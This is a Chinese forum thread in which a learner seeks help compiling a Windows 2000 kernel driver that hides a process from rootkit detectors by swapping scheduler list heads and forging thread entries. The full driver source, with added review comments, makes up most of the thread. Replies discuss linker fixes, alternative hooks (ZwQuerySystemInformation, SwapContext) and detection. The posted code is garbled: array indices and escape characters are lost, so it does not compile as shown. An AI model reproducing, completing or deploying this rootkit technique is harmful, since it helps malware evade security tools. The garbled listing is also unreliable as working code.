有关利用驱动实现进程隐藏的问题
小弟我迫切需要帮助:
我在学习SoBeIt的“绕过内核调度链表进程检测”中的代码部分,但把里面的程序拿来调试时却遇到很多问题, 这个程序需要使用DDK调试吗? 我目前使用的是DDK+VC+DriverStudio调试,但现在遇到的问题是调试时,编译器报告: error LNK2001: unresolved external symbol "__declspec(dllimport) long __stdcall PsTerminateSystemThread(long)" (__imp_?PsTerminateSystemThread@@YGJJ@Z) proke.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExFreePool(void *)" (__imp_?ExFreePool@@YGXPAX@Z) 但是“PsTerminateSystemThread”不是在“ntddk.h”中有声明吗,我在程序开头的头文件包括了: #include "ntddk.h" #include "ntifs.h" #include "stdio.h" #include "stdarg.h" 为什么会导致上面的错误呢,大虾们,同情一下嘛 //////////////////////////////////////////////////////////// 绕过内核调度链表进程检测(By SoBeIt) (http://www.xfocus.net/articles/200404/693.html) |
沙发#
发布于:2005-01-28 18:22
你出现的不是编译错误,而是linking error!
需要将相应的导入库(Import LIB)加入工程的链接输入——对驱动程序来说就是 DDK 里的 ntoskrnl.lib(PsTerminateSystemThread、ExFreePool 都由 ntoskrnl.exe 导出), 或者使用LoadLibrary和GetProcAddress来进行显式调用(注:这一条只适用于用户态模块,内核例程拿不到,见后面的回复)。另外,错误信息里的符号是 C++ 修饰名(?PsTerminateSystemThread@@YGJJ@Z),说明源文件是按 C++ 编译的,而 ntoskrnl.lib 里是未修饰的 C 符号:要么把那几个 #include 用 extern "C" { } 包起来,要么把源文件改成按 C 编译。 |
板凳#
发布于:2005-01-28 18:29
呵呵,前两天刚刚搞的这个咚咚。
PsTerminateSystemThread是一个内核函数,你要在用户空间用的话会有这样的问题的。 你可以试试用GetProcAddress("ntdll.dll", "PsTerminateSystemThread"),显式获得该函数的地址,然后看看行不行。(注:ntdll.dll 并不导出这个内核例程,这条路走不通,见 6 楼的纠正。) 对了,你的目的是什么?? |
地板#
发布于:2005-01-28 18:38
隐藏进程
地下室#
发布于:2005-01-29 00:21
他是驱动程序,不是应用程序....
5楼#
发布于:2005-01-29 11:10
内核函数是不能在应用层调用的,在98下可以通过门调用转到
RING0层进行访问。在2K,XP下还须做一个驱动程序. |
6楼#
发布于:2005-01-29 11:13
你出现的不是编译错误,而是linking error! 连接错误就没有错,但这个是内核函数,使用LoadLibrary和GetProcAddress来进行显式调用应该不能得到PsTerminateSystemThread和ExFreePool等函数的地址 |
7楼#
发布于:2005-01-29 11:36
psterminatesystemthread不是在ntddk.h中已经声明了的吗,怎么还会发生链接错误呢
8楼#
发布于:2005-01-29 11:45
[quote]你出现的不是编译错误,而是linking error! 连接错误就没有错,但这个是内核函数,使用LoadLibrary和GetProcAddress来进行显式调用应该不能得到PsTerminateSystemThread和ExFreePool等函数的地址 [/quote] 那怎么办呀....? :( |
9楼#
发布于:2005-01-31 10:41
MmGetSystemRoutineAddress——内核态里按名字解析 ntoskrnl/hal 导出例程地址的接口(相当于内核版的 GetProcAddress),可以在运行时取得 PsTerminateSystemThread 这类函数的地址;不过对这种直接调用的情况,正常做法还是链接 DDK 的 ntoskrnl.lib。
10楼#
发布于:2005-01-31 11:38
#ifdef DBG
TARGETLIBS="D:\\NTDDK\\libchk\\i386\\ntoskrnl.lib" #else TARGETLIBS="D:\\NTDDK\\libfre\\i386\\ntoskrnl.lib" #endif 上面的语句有什么错呢,为什么总是报: error C2501: 'TARGETLIBS' : missing storage-class or type specifiers |
11楼#
发布于:2005-01-31 11:40
#ifdef DBG
TARGETLIBS="D:\\NTDDK\\libchk\\i386\\ntoskrnl.lib" #else TARGETLIBS="D:\\NTDDK\\libfre\\i386\\ntoskrnl.lib" #endif 上面的语句有什么错呢,为什么总是报: error C2501: 'TARGETLIBS' : missing storage-class or type specifiers |
12楼#
发布于:2005-01-31 14:29
建议你通过Hook ZwQuerySystemInformation来实现吧,写一个简单的驱动,只Hook这个函数就够了,网上有很多这样的帖子,你可以看看。
13楼#
发布于:2005-01-31 14:42
建议你通过Hook ZwQuerySystemInformation来实现吧,写一个简单的驱动,只Hook这个函数就够了,网上有很多这样的帖子,你可以看看。 你好象过于自信了吧??? 我通过挂钩SwapContext函数可以显示所有的进程(只要该线程被调度了),SOBEIT的方法只能针对2K下使用KLISTER,而挂钩SwapContext函数可以通用于2K/XP/2003等,等我修正了KLISTER贴出来,你们看看还有进程能被隐藏吗??嘿嘿...... |
14楼#
发布于:2005-01-31 15:39
干脆我们大家来看源代码吧:
/*
 * SchList.sys -- kernel-mode worker that swaps the Windows 2000 scheduler
 * list heads (KiWaitInListHead, KiWaitOutListHead and the 32-entry
 * KiDispatcherReadyListHead array) for private copies, then refills the
 * original, now-unused heads with forged thread entries so that a tool
 * walking those heads (KLISTER-style detection) sees every thread except
 * those of the process whose PID is 8.  This is the listing the poster asked
 * for help with; it has been re-flowed one statement per line and annotated,
 * but no code token has been changed.
 *
 * NOTE(review): the forum software appears to have mangled the source:
 *   - every "[i]" array index is gone (BBCode reads "[i]" as italics), so
 *     "SysKiWaitInListHeadAddr", "pKiDispatcherReadyListHead" etc. appear
 *     where "...[i]" was evidently intended -- those lines do not compile
 *     as shown;
 *   - string escapes lost a backslash: "\n" shows as "n", and the device
 *     names look like "\??\SchList" / "\Device\SchList" where the doubled
 *     form is needed in a C literal.
 * NOTE(review): every kernel address in ReplaceList() is hard-coded for one
 *   specific ntoskrnl build.  On any other build the writes land in
 *   arbitrary kernel memory.
 * NOTE(review): "TARGETLIBS=..." (the C2501 error quoted in this thread) is
 *   a macro for the DDK build utility's SOURCES file, not a C statement; in
 *   a VC project add the DDK's ntoskrnl.lib to the linker inputs instead.
 */
#include "ntddk.h"
/* ntifs.h normally ships with the IFS Kit rather than the base DDK (the poster
 * says this copy came from the web).  PSERVICE_DESCRIPTOR_TABLE below is not
 * declared by the stock ntddk.h, so it presumably comes from that file --
 * confirm against the copy actually used. */
#include "ntifs.h"
#include "stdio.h"
#include "stdarg.h"

/* Per-device state shared by DriverEntry, DriverUnload and the worker thread. */
typedef struct _DEVICE_EXTENSION {
    HANDLE hWorkerThread;          /* from PsCreateSystemThread; never closed with ZwClose (handle leak) */
    KEVENT ExitEvent;              /* set by DriverUnload; tells the worker to restore the lists and exit */
    PDEVICE_OBJECT pDeviceObject;
    BOOLEAN bExit;                 /* written by DriverUnload but never read; ExitEvent is the real signal */
}DEVICE_EXTENSION, *PDEVICE_EXTENSION;

/*
 * Partial mirror of the Windows 2000 ETHREAD layout (KTHREAD first).  Forged
 * entries of this type are what the old list heads are refilled with, so a
 * walker dereferencing a fake entry reads a snapshot of the real thread.
 * With 32-bit DDK sizes WaitListEntry should sit at offset 0x5c, which is the
 * constant ReplaceList() subtracts from a list entry to reach the thread --
 * CONTAINING_RECORD(pEntry, FAKE_ETHREAD, WaitListEntry) would say the same
 * thing without the magic number.
 */
typedef struct _FAKE_ETHREAD{
    DISPATCHER_HEADER Header;
    LIST_ENTRY MutantListHead;
    PVOID InitialStack;
    PVOID StackLimit;
    struct _TEB *Teb;
    PVOID TlsArray;
    PVOID KernelStack;
    BOOLEAN DebugActive;
    UCHAR State;
    USHORT Alerted;
    UCHAR Iopl;
    UCHAR NpxState;
    UCHAR Saturation;
    UCHAR Priority;
    KAPC_STATE ApcState;           /* ApcState.Process is how the owning EPROCESS is found below */
    ULONG ContextSwitches;
    NTSTATUS WaitStatus;
    UCHAR WaitIrql;
    UCHAR WaitMode;
    UCHAR WaitNext;
    UCHAR WaitReason;
    PKWAIT_BLOCK WaitBlockList;
    LIST_ENTRY WaitListEntry;      /* link in KiWaitIn/OutListHead or a ready list */
    ULONG WaitTime;
    UCHAR BasePriority;
    UCHAR DecrementCount;
    UCHAR PriorityDecrement;
    UCHAR Quantum;
    KWAIT_BLOCK WaitBlock[4];
    ULONG LegoData;
    ULONG KernelApcDisable;
    ULONG UserAffinity;
    BOOLEAN SystemAffinityActive;
    UCHAR PowerState;
    UCHAR NpxIrql;
    UCHAR Pad[1];
    PSERVICE_DESCRIPTOR_TABLE ServiceDescriptorTable;
    PKQUEUE Queue;
    KSPIN_LOCK ApcQueueLock;
    KTIMER Timer;
    LIST_ENTRY QueueListEntry;
    ULONG Affinity;
    BOOLEAN Preempted;
    BOOLEAN ProcessReadyQueue;
    BOOLEAN KernelStackResident;
    UCHAR NextProcessor;
    PVOID CallbackStack;
    PVOID Win32Thread;
    PKTRAP_FRAME TrapFrame;
    PKAPC_STATE ApcStatePointer[2];
    UCHAR PreviousMode;
    BOOLEAN EnableStackSwap;
    BOOLEAN LargeStack;
    UCHAR ResourceIndex;
    ULONG KernelTime;
    ULONG UserTime;
    KAPC_STATE SavedApcState;
    BOOLEAN Alertable;
    UCHAR ApcStateIndex;
    BOOLEAN ApcQueueable;
    BOOLEAN AutoAlignment;
    PVOID StackBase;
    KAPC SuspendApc;
    KSEMAPHORE SuspendSemaphore;
    LIST_ENTRY ThreadListEntry;
    UCHAR FreezeCount;
    UCHAR SuspendCount;
    UCHAR IdealProcessor;
    BOOLEAN DisableBoost;
    LARGE_INTEGER CreateTime;
    union {
        LARGE_INTEGER ExitTime;
        LIST_ENTRY LpcReplyChain;
    };
    union {
        NTSTATUS ExitStatus;
        PVOID OfsChain;
    };
    LIST_ENTRY PostBlockList;
    LIST_ENTRY TerminationPortList;
    KSPIN_LOCK ActiveTimerListLock;
    LIST_ENTRY ActiveTimerListHead;
    CLIENT_ID Cid;
}FAKE_ETHREAD, *PFAKE_ETHREAD;

/*
 * Worker thread body.  pContext is the PDEVICE_EXTENSION handed to
 * PsCreateSystemThread in DriverEntry.
 *
 * Phase 1 (DISPATCH_LEVEL): move the live scheduler lists from their original
 *   heads onto freshly allocated heads, then overwrite every hard-coded
 *   location in ntoskrnl that names an old head (the Sys*Addr arrays) with
 *   the new head's address, so the scheduler keeps running on the new heads.
 * Phase 2 (loop, every 10 s until ExitEvent is set): re-initialise the old
 *   heads and refill them with heap copies of the live entries, skipping
 *   threads whose process has PID 8.  A walker of the old heads therefore
 *   sees all threads except that process's.
 * Phase 3 (on ExitEvent): move the lists back, re-patch the references to
 *   the old heads, free the new heads and terminate the thread.
 *
 * Known problems, all visible in the code below:
 *   - DpcSpinLock is private to this driver, so it excludes nothing but
 *     this thread; raising to DISPATCH_LEVEL only stops preemption on the
 *     current CPU.  The scheduler on another CPU can walk the lists while
 *     they are half-spliced.
 *   - Every ExAllocatePool result is used unchecked.
 *   - Each phase-2 iteration allocates a new FAKE_ETHREAD per thread and
 *     never frees the previous round's copies (the old heads are simply
 *     re-initialised), so pool is leaked every 10 s.
 *   - The fakes come from PagedPool although they are linked into
 *     dispatcher-list structures that a reader may touch at DISPATCH_LEVEL.
 *   - The __except handler neither lowers IRQL nor releases the lock if a
 *     fault happens inside phase 1 or 3.
 */
VOID ReplaceList(PVOID pContext)
{
    PLIST_ENTRY pFirstEntry, pLastEntry, pPrevEntry, pNextEntry, pEntry;   /* pPrevEntry, pNextEntry unused */
    PLIST_ENTRY pNewKiDispatcherReadyListHead,pNewKiWaitInListHead,pNewKiWaitOutListHead;
    PLIST_ENTRY pKiDispatcherReadyListHead,pKiWaitInListHead,pKiWaitOutListHead;
    int i, ChangeList;
    /* Locations inside one specific ntoskrnl build that appear to embed the
     * address of each list head (immediate operands of instructions that touch
     * the lists).  Each of them is patched in place in phase 1 and again in
     * phase 3.  The "Add4" variants reference head+4, i.e. the Blink field. */
    int SysKiWaitInListHeadAddr[] = {0x8042d90b, 0x8042db78, 0x8042de57, 0x8042f176, 0x8046443b, 0x80464441, 0x804644d6};
    int SysKiWaitOutListHeadAddr[] = {0x8042d921, 0x8042db90, 0x8042de6f, 0x8042f18e, 0x80464494};
    int SysKiWaitOutListHeadAdd4Addr[] = {0x8046448e, 0x804644a1};
    int SysKiDispatcherReadyListHeadAddr[] = {0x804041ff, 0x8042faad, 0x804313de, 0x80431568, 0x8043164f, 0x80431672, 0x8043379f, 0x8046462d};
    int SysKiDispatcherReadyListHeadAdd4Addr = 0x8043166b;
    KIRQL OldIrql;
    KSPIN_LOCK DpcSpinLock;        /* local lock: protects against nothing but this thread */
    LARGE_INTEGER DelayTime;
    NTSTATUS Status;
    PDEVICE_EXTENSION pDevExt;
    PEPROCESS pEPROCESS;
    PETHREAD pETHREAD;
    ULONG PID;
    PFAKE_ETHREAD pFakeETHREAD;

    pDevExt = (PDEVICE_EXTENSION)pContext;
    DelayTime.QuadPart = -(10 * 1000 * 10000);      /* relative 10 s, in 100 ns units */

    /* Hard-coded addresses of the real list heads in this kernel build. */
    pKiWaitInListHead = (PLIST_ENTRY)0x80482258;
    pKiWaitOutListHead = (PLIST_ENTRY)0x80482808;
    pKiDispatcherReadyListHead = (PLIST_ENTRY)0x804822e0;

    /* Replacement heads; allocation failures are not checked. */
    pNewKiWaitInListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool,sizeof(LIST_ENTRY));
    pNewKiWaitOutListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool, sizeof(LIST_ENTRY));
    pNewKiDispatcherReadyListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool, 32 * sizeof(LIST_ENTRY));
    InitializeListHead(pNewKiWaitInListHead);
    InitializeListHead(pNewKiWaitOutListHead);
    for(i = 0; i < 32; i++)
    {
        InitializeListHead(&pNewKiDispatcherReadyListHead);   /* sic: "[i]" lost in the post */
    }
    KeInitializeSpinLock(&DpcSpinLock);

    __try
    {
        /* ---- Phase 1: re-home the live lists onto the new heads ---- */
        OldIrql = KeRaiseIrqlToDpcLevel();
        KeAcquireSpinLockAtDpcLevel(&DpcSpinLock);

        /* Wait-in list: point the new head at the existing chain and fix the
         * two end entries to point back at the new head. */
        pFirstEntry = pKiWaitInListHead->Flink;
        pLastEntry = pKiWaitInListHead->Blink;
        pNewKiWaitInListHead->Flink = pFirstEntry;
        pNewKiWaitInListHead->Blink = pLastEntry;
        pFirstEntry->Blink = pNewKiWaitInListHead;
        pLastEntry->Flink = pNewKiWaitInListHead;
        for(i = 0; i < 7; i++)
        {
            ChangeList = SysKiWaitInListHeadAddr;              /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pNewKiWaitInListHead;  /* writes into the kernel image */
            DbgPrint("NewWaitIn:%8x",*(PULONG)ChangeList);
        }

        /* Wait-out list, same procedure. */
        pFirstEntry = pKiWaitOutListHead->Flink;
        pLastEntry = pKiWaitOutListHead->Blink;
        pNewKiWaitOutListHead->Flink = pFirstEntry;
        pNewKiWaitOutListHead->Blink = pLastEntry;
        pFirstEntry->Blink = pNewKiWaitOutListHead;
        pLastEntry->Flink = pNewKiWaitOutListHead;
        for(i = 0; i < 5; i++)
        {
            ChangeList = SysKiWaitOutListHeadAddr;             /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pNewKiWaitOutListHead;
            DbgPrint("NewWaitOut:%8x",*(PULONG)ChangeList);
        }
        for(i = 0; i < 2; i++)
        {
            ChangeList = SysKiWaitOutListHeadAdd4Addr;         /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pNewKiWaitOutListHead + 0x4;
            DbgPrint("NewWaitOut+4:%8x",*(PULONG)ChangeList);
        }

        /* The 32 ready lists (one per priority): only non-empty ones are
         * re-homed; an empty old head is left pointing at itself. */
        for(i = 0; i < 32; i++)
        {
            if(pKiDispatcherReadyListHead.Flink != &pKiDispatcherReadyListHead)   /* sic: "[i]" lost throughout this loop */
            {
                pFirstEntry = pKiDispatcherReadyListHead.Flink;
                pLastEntry = pKiDispatcherReadyListHead.Blink;
                pNewKiDispatcherReadyListHead.Flink = pFirstEntry;
                pNewKiDispatcherReadyListHead.Blink = pLastEntry;
                pFirstEntry->Blink = &pNewKiDispatcherReadyListHead;
                pLastEntry->Flink = &pNewKiDispatcherReadyListHead;
            }
        }
        for(i = 0; i < 8; i++)
        {
            ChangeList = SysKiDispatcherReadyListHeadAddr;     /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pNewKiDispatcherReadyListHead;
            DbgPrint("NewDispatcher:%8x", *(PULONG)ChangeList);
        }
        ChangeList = SysKiDispatcherReadyListHeadAdd4Addr;
        *(PULONG)ChangeList = (ULONG)pNewKiDispatcherReadyListHead + 0x4;
        DbgPrint("NewDispatcher+4:%8x", *(PULONG)ChangeList);

        KeReleaseSpinLockFromDpcLevel(&DpcSpinLock);
        KeLowerIrql(OldIrql);

        /* ---- Phase 2: keep the old heads populated with forged entries ---- */
        for(;;)
        {
            /* Drop whatever the old heads held last round.  The previous
             * round's FAKE_ETHREAD allocations are orphaned here, never freed. */
            InitializeListHead(pKiWaitInListHead);
            InitializeListHead(pKiWaitOutListHead);
            for(i = 0; i < 32; i++)
            {
                InitializeListHead(&pKiDispatcherReadyListHead);   /* sic: "[i]" lost in the post */
            }

            /* Walk the live wait-in list (now on the new head) and copy every
             * thread except those owned by PID 8 into the old head.
             * 0x5c = offset of WaitListEntry in the thread; 0x9c = offset of
             * the process ID in this build's EPROCESS (hard-coded). */
            for(pEntry = pNewKiWaitInListHead->Flink; pEntry && pEntry != pNewKiWaitInListHead; pEntry = pEntry->Flink)
            {
                pETHREAD = (PETHREAD)(((PCHAR)pEntry)-0x5c);
                pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process);
                PID = *(PULONG)(((PCHAR)pEPROCESS)+0x9c);
                if(PID == 0x8)
                {
                    continue;                                   /* this is the process being hidden */
                }
                /* PagedPool for a structure linked into a dispatcher list; result unchecked. */
                pFakeETHREAD =(PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD));
                memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD));
                InsertHeadList(pKiWaitInListHead, &pFakeETHREAD->WaitListEntry);
            }

            /* Same for the wait-out list. */
            for(pEntry = pNewKiWaitOutListHead->Flink; pEntry && pEntry != pNewKiWaitOutListHead; pEntry = pEntry->Flink)
            {
                pETHREAD = (PETHREAD)(((PCHAR)pEntry)-0x5c);
                pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process);
                PID = *(PULONG)(((PCHAR)pEPROCESS)+0x9c);
                if(PID == 0x8)
                {
                    continue;
                }
                pFakeETHREAD = (PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD));
                memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD));
                InsertHeadList(pKiWaitOutListHead, &pFakeETHREAD->WaitListEntry);
            }

            /* And for each of the 32 ready lists. */
            for(i = 0; i < 32 ; i++)
            {
                for(pEntry = pNewKiDispatcherReadyListHead.Flink; pEntry && pEntry != &pNewKiDispatcherReadyListHead; pEntry = pEntry->Flink)   /* sic: "[i]" lost */
                {
                    pETHREAD = (PETHREAD)(((char *)pEntry)-0x5c);
                    pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process);
                    PID = *(ULONG *)(((char *)pEPROCESS)+0x9c);
                    if(PID == 0x8)
                    {
                        continue;
                    }
                    pFakeETHREAD = (PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD));
                    memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD));
                    InsertHeadList(&pKiDispatcherReadyListHead, &pFakeETHREAD->WaitListEntry);   /* sic: "[i]" lost */
                }
            }

            DbgPrint("pKiWaitInListHead->Flink:%8x", pKiWaitInListHead->Flink);
            DbgPrint("pKiWaitInListHead->Blink:%8x", pKiWaitInListHead->Blink);
            DbgPrint("pKiWaitOutListHead->Flink:%8x", pKiWaitOutListHead->Flink);
            DbgPrint("pKiWaitOutListHead->Blink:%8x", pKiWaitOutListHead->Blink);
            DbgPrint("pKiDispatcherReadyListHead[0].Flink:%8x", pKiDispatcherReadyListHead[0].Flink);
            DbgPrint("pKiDispatcherReadyListHead[0].Blink:%8x", pKiDispatcherReadyListHead[0].Blink);

            /* Sleep up to 10 s; STATUS_SUCCESS means ExitEvent was set by
             * DriverUnload, STATUS_TIMEOUT means do another round. */
            Status = KeWaitForSingleObject(&pDevExt->ExitEvent, Executive, KernelMode, FALSE, &DelayTime);
            if(Status == STATUS_SUCCESS)
                break;
        }

        /* ---- Phase 3: put everything back (mirror of phase 1) ---- */
        OldIrql = KeRaiseIrqlToDpcLevel();
        KeAcquireSpinLockAtDpcLevel(&DpcSpinLock);

        pFirstEntry = pNewKiWaitInListHead->Flink;
        pLastEntry = pNewKiWaitInListHead->Blink;
        pKiWaitInListHead->Flink = pFirstEntry;
        pKiWaitInListHead->Blink = pLastEntry;
        pFirstEntry->Blink = pKiWaitInListHead;
        pLastEntry->Flink = pKiWaitInListHead;
        for(i = 0; i < 7; i++)
        {
            ChangeList = SysKiWaitInListHeadAddr;              /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pKiWaitInListHead;
            DbgPrint("OrgWaitIn:%8x",*(PULONG)ChangeList);
        }

        pFirstEntry = pNewKiWaitOutListHead->Flink;
        pLastEntry = pNewKiWaitOutListHead->Blink;
        pKiWaitOutListHead->Flink = pFirstEntry;
        pKiWaitOutListHead->Blink = pLastEntry;
        pFirstEntry->Blink = pKiWaitOutListHead;
        pLastEntry->Flink = pKiWaitOutListHead;
        for(i = 0; i < 5; i++)
        {
            ChangeList = SysKiWaitOutListHeadAddr;             /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pKiWaitOutListHead;
            DbgPrint("OrgWaitOut:%8x",*(PULONG)ChangeList);
        }
        for(i = 0; i < 2; i++)
        {
            ChangeList = SysKiWaitOutListHeadAdd4Addr;         /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pKiWaitOutListHead + 0x4;
            DbgPrint("OrgWaitOut+4:%8x",*(PULONG)ChangeList);
        }

        /* Note: a ready list that was empty in phase 1 but gained entries on
         * the new head since is moved back here; one that became empty on the
         * new head is skipped, leaving the old head with whatever phase 2
         * last forged into it. */
        for(i = 0; i < 32; i++)
        {
            if(pNewKiDispatcherReadyListHead.Flink != &pNewKiDispatcherReadyListHead)   /* sic: "[i]" lost throughout this loop */
            {
                pFirstEntry = pNewKiDispatcherReadyListHead.Flink;
                pLastEntry = pNewKiDispatcherReadyListHead.Blink;
                pKiDispatcherReadyListHead.Flink = pFirstEntry;
                pKiDispatcherReadyListHead.Blink = pLastEntry;
                pFirstEntry->Blink = &pKiDispatcherReadyListHead;
                pLastEntry->Flink = &pKiDispatcherReadyListHead;
            }
        }
        for(i = 0; i < 8; i++)
        {
            ChangeList = SysKiDispatcherReadyListHeadAddr;     /* sic: "[i]" lost in the post */
            *(PULONG)ChangeList = (ULONG)pKiDispatcherReadyListHead;
            DbgPrint("NewDispatcher:%8x", *(PULONG)ChangeList);   /* label is misleading: this is the restore path */
        }
        ChangeList = SysKiDispatcherReadyListHeadAdd4Addr;
        *(PULONG)ChangeList = (ULONG)pKiDispatcherReadyListHead + 0x4;
        DbgPrint("NewDispatcher+4:%8x", *(PULONG)ChangeList);

        KeReleaseSpinLockFromDpcLevel(&DpcSpinLock);
        KeLowerIrql(OldIrql);

        /* Only the three replacement heads are freed; the forged entries left
         * in the old heads (and all earlier rounds) are not. */
        ExFreePool(pNewKiWaitInListHead);
        ExFreePool(pNewKiWaitOutListHead);
        ExFreePool(pNewKiDispatcherReadyListHead);
        DbgPrint("Now terminate system thread.n");            /* sic: "\n" lost in the post */
        PsTerminateSystemThread(STATUS_SUCCESS);
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        /* If the fault happened at DISPATCH_LEVEL with DpcSpinLock held, neither
         * is undone here, and the lists may be left half-spliced. */
        DbgPrint("Error occured in ReplaceList().n");
    }
    return;
}

/*
 * Unload routine: signals the worker to restore the scheduler lists, waits a
 * fixed 8 s, then deletes the symbolic link and device object.
 *
 * NOTE(review): the fixed delay is a race, not a join -- if the worker has
 * not finished phase 3 after 8 s, the driver image is unmapped underneath it.
 * Waiting on the thread object (ObReferenceObjectByHandle on hWorkerThread,
 * then KeWaitForSingleObject) would be the correct synchronisation.
 * NOTE(review): the "Detect device failed." message is printed on every
 * unload, including the successful path, because the if-block does not
 * return.  pWorkerThread and Status are unused.
 */
void DriverUnload(IN PDRIVER_OBJECT pDriObj)
{
    WCHAR DevLinkBuf[] = L"\??\SchList";           /* sic: backslashes appear halved by the post */
    UNICODE_STRING uniDevLink;
    PDEVICE_OBJECT pDevObj;
    PVOID pWorkerThread;
    PDEVICE_EXTENSION pDevExt;
    NTSTATUS Status;
    LARGE_INTEGER WaitTime;

    WaitTime.QuadPart = -(8 * 1000 * 10000);        /* relative 8 s */
    pDevObj = pDriObj->DeviceObject;
    pDevExt = (PDEVICE_EXTENSION)pDevObj->DeviceExtension;
    pDevExt->bExit = TRUE;                          /* never read by the worker */
    __try
    {
        KeSetEvent(&pDevExt->ExitEvent, 0, FALSE);  /* wakes the worker out of its 10 s wait */
        KeDelayExecutionThread(KernelMode, FALSE, &WaitTime);
        DbgPrint("SchList:Worker thread killed.n");
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        DbgPrint("Error occured in Unload().n");
    }
    if(pDevObj)
    {
        RtlInitUnicodeString(&uniDevLink,DevLinkBuf);
        IoDeleteSymbolicLink(&uniDevLink);
        IoDeleteDevice(pDevObj);
        DbgPrint(("SchList.sys:Driver Unload successfully.n"));
    }
    DbgPrint(("SchList.sys:Detect device failed.n"));   /* reached on the success path too */
}

/*
 * Driver entry point: creates \Device\SchList and its \??\SchList link,
 * initialises the device extension and starts the ReplaceList worker.
 *
 * NOTE(review): no IRP_MJ_* dispatch routines are installed, so the device
 * exists only as a handle for unload.  The three *Addr locals duplicate the
 * constants hard-coded inside ReplaceList() and are otherwise unused, as is
 * puniRegPath.  The PsCreateSystemThread result is not checked and the
 * returned handle is never closed.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriObj, IN PUNICODE_STRING puniRegPath)
{
    WCHAR DevNameBuf[] = L"\Device\SchList";       /* sic: backslashes appear halved by the post */
    UNICODE_STRING uniDevName;
    WCHAR DevLinkBuf[] = L"\??\SchList";           /* sic: see above */
    UNICODE_STRING uniDevLink;
    PDEVICE_OBJECT pDevObj;
    PDEVICE_EXTENSION pDevExt;
    NTSTATUS status;
    int pKiDispatcherReadyListHeadAddr = 0x804822e0;   /* unused */
    int pKiWaitInListHeadAddr = 0x80482258;            /* unused */
    int pKiWaitOutListHeadAddr = 0x80482808;           /* unused */

    DbgPrint(("SchList:Enter DriverEntry.n"));
    RtlInitUnicodeString(&uniDevName,DevNameBuf);
    status = IoCreateDevice(pDriObj, sizeof(DEVICE_EXTENSION), &uniDevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDevObj);
    if(!NT_SUCCESS(status))
    {
        DbgPrint(("SchList.sys:Create device failed.n"));
        return status;
    }
    DbgPrint(("SchList.sys:Create device successfully.n"));
    pDevExt = (PDEVICE_EXTENSION) pDevObj->DeviceExtension;
    pDevExt->pDeviceObject = pDevObj;
    /* Synchronization event: auto-resets after the worker's wait is satisfied. */
    KeInitializeEvent(&pDevExt->ExitEvent, SynchronizationEvent, 0);
RtlInitUnicodeString(&uniDevLink,DevLinkBuf); status = IoCreateSymbolicLink(&uniDevLink, &uniDevName); if(!NT_SUCCESS(status)) { DbgPrint(("SchList.sys:Create symbolic link failed.n")); return status; } pDriObj->DriverUnload = DriverUnload; PsCreateSystemThread(&pDevExt->hWorkerThread, (ACCESS_MASK)0L, NULL, (HANDLE)0L, NULL, ReplaceList, pDevExt); return STATUS_SUCCESS; } 开头那里有个ntifs.h,这个文件是干嘛的哟,DDK里没有,我是到网上找的一个, 以上就是全部代码,各位,帮帮忙看看,为什么我在VC+DDK+DS里总是把它调不正确 指点指点吧! [编辑 - 2/1/05 by znsoft] |